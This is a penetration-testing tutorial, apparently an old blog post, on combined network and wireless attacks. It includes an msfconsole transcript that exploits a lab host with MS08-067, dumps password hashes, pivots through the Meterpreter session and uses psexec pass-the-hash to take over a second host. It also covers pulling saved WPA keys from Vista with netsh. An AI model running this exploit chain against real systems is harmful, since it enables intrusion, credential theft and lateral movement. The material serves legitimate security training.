Saturday, 8 February 2014

Let’s build on the concept of combined testing

We’ll discuss useful new tools and techniques, and we’ll look at how these concepts can be used in a combined network/wireless/web app pen test.

Today’s Focus

  • In Part 1, the flow was 1) wireless 2) web app 3) network exploitation
  • To illustrate the pragmatic and iterative nature of combined tests, we’ll alter the order this time:
  • 1) Network exploitation – useful Metasploit features (Metasploit’s built-in route command, the psexec exploit, and its pass-the-hash feature)
  • 2) Wireless attack – Vista wireless power tools (including VistaRFMON)
  • 3) Web app attack – discovery and exploitation (using w3af)

Network Attack Tools and Techniques

Metasploit’s Route Command

  • Metasploit includes many server-side and client-side exploits
  • Use the Metasploit 3.x console “route” command to pivot through an already-exploited host
– Adds a route for the target subnet via an existing Meterpreter session, so follow-on exploits and payloads are carried across that session instead of being sent from the attacker’s own interfaces
– Don’t confuse this with the Meterpreter “route” command, which displays and modifies the routing table of the compromised host itself


Metasploit’s psexec Feature

  • Remember the great free psexec tool from Microsoft SysInternals?
– Allows a user with admin credentials to make a remote Windows box run a command over SMB connections (it copies a service binary to the ADMIN$ share and starts it through the Service Control Manager)
  • Metasploit includes a psexec exploit with very similar features
  • A pen tester can use one compromised Windows machine to cause another machine to run cmd.exe (or a Meterpreter payload) for a nice little pivot
  • First, exploit victim1 with exploit1 and Meterpreter payload, then…


Metasploit’s Integrated Pass-the-Hash

  • Metasploit psexec has built-in pass-the-hash capability!
– Instead of configuring psexec with the admin name and password, just configure it with the admin name and the LM:NT hash pair dumped from victim1 with Meterpreter’s priv extension (hashdump)
– This works because NTLM authentication over SMB only needs the NT hash, never the cleartext password
  • First, exploit victim1 with exploit1 and Meterpreter payload, then…
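The three features above (console route, psexec, pass-the-hash) are really one procedure. The following msfconsole transcript walks through it end to end. It is an added example and not from the original slides; the lab layout is assumed (attacker 192.168.1.5; victim1 192.168.1.50, dual-homed onto 10.10.10.0/24; victim2 10.10.10.20 reachable only from victim1), MS08-067 stands in for “exploit1”, and the LM:NT pair shown is the well-known hash of an empty password, used purely as a placeholder for whatever hashdump returns.

```console
# Added example (not from the original slides). Assumed lab:
#   attacker 192.168.1.5
#   victim1  192.168.1.50 (exploitable directly) with a second NIC on 10.10.10.0/24
#   victim2  10.10.10.20  (reachable only from victim1)

# Step 1: exploit victim1 ("exploit1" here is MS08-067) with a Meterpreter payload
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.50
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.5
msf exploit(ms08_067_netapi) > exploit
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.50:1041)

# Step 2: confirm the second network and dump hashes from victim1.
# NOTE: this "route" is Meterpreter's own command; it only prints victim1's
# routing table and is unrelated to the console "route" used in Step 3.
meterpreter > ipconfig
meterpreter > route
meterpreter > use priv          # Metasploit 3.x; newer versions load priv automatically
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > background        # Ctrl-Z in older 3.x consoles

# Step 3: tell the Metasploit console to reach 10.10.10.0/24 through session 1
msf > route add 10.10.10.0 255.255.255.0 1
msf > route print

# Step 4: psexec against victim2 with the dumped hash (pass-the-hash).
# A bind payload is used because victim2 cannot reach the attacker directly;
# Metasploit connects to the bound port through the route added above.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.10.10.20
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(psexec) > exploit
[*] Meterpreter session 2 opened (192.168.1.50 -> 10.10.10.20:4444 via session 1)
```

Two caveats worth checking before blaming the tooling: the psexec module needs SMB (TCP 445) and a local or domain account that is a member of Administrators on the target, and on Vista and later a local admin other than the built-in RID-500 Administrator receives a filtered token over the network and is refused access to ADMIN$ unless LocalAccountTokenFilterPolicy has been set to 1. Domain admin accounts are not subject to that filtering.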

Wireless Attack Tools and Techniques

Vista Wireless Power Tools

  • Vista introduces an all-new wireless stack
– Lots of new and powerful features
  • NDIS 6 (Vista’s driver model) requires wireless drivers to support monitor-mode packet capture
– Previously limited to Linux or commercial drivers
  • Unfortunately, this capability is not exposed in any built-in applications

Capturing Vista Wireless Traffic

  • With RFMON capture, the attacker uses a compromised Vista host to discover and attack nearby networks
– It’s like having a remote Linux box, sort of
  • Packet capture is supplied by Microsoft Network Monitor (NetMon) 3.2
– Silent command-line install and capture… no reboot required
  • Attacker can enumerate, analyze and attack wireless networks seen by the victim
  • Wireless attack tools do not read NetMon’s WLAN capture format
  • Solution: nm2lp
– Converts NetMon WLAN captures to libpcap format, so the usual attack tools can consume them


Leveraging Vista “netsh wlan”

  • Attacker can extract useful Vista WLAN config data with the built-in “netsh wlan” command (for example, “netsh wlan show profiles” lists the preferred networks and “netsh wlan export profile” writes each saved profile out as XML)

– WPA/2-PSK passwords, configuration settings, preferred networks, certificate store, etc.
  • Can also establish new networks

– Ad-hoc interfaces, bridged to Ethernet interfaces (requires the third-party tool nethelper.exe, which has no GUI)
– Gives a local WLAN attacker a layer-2 connection into the victim’s wired network
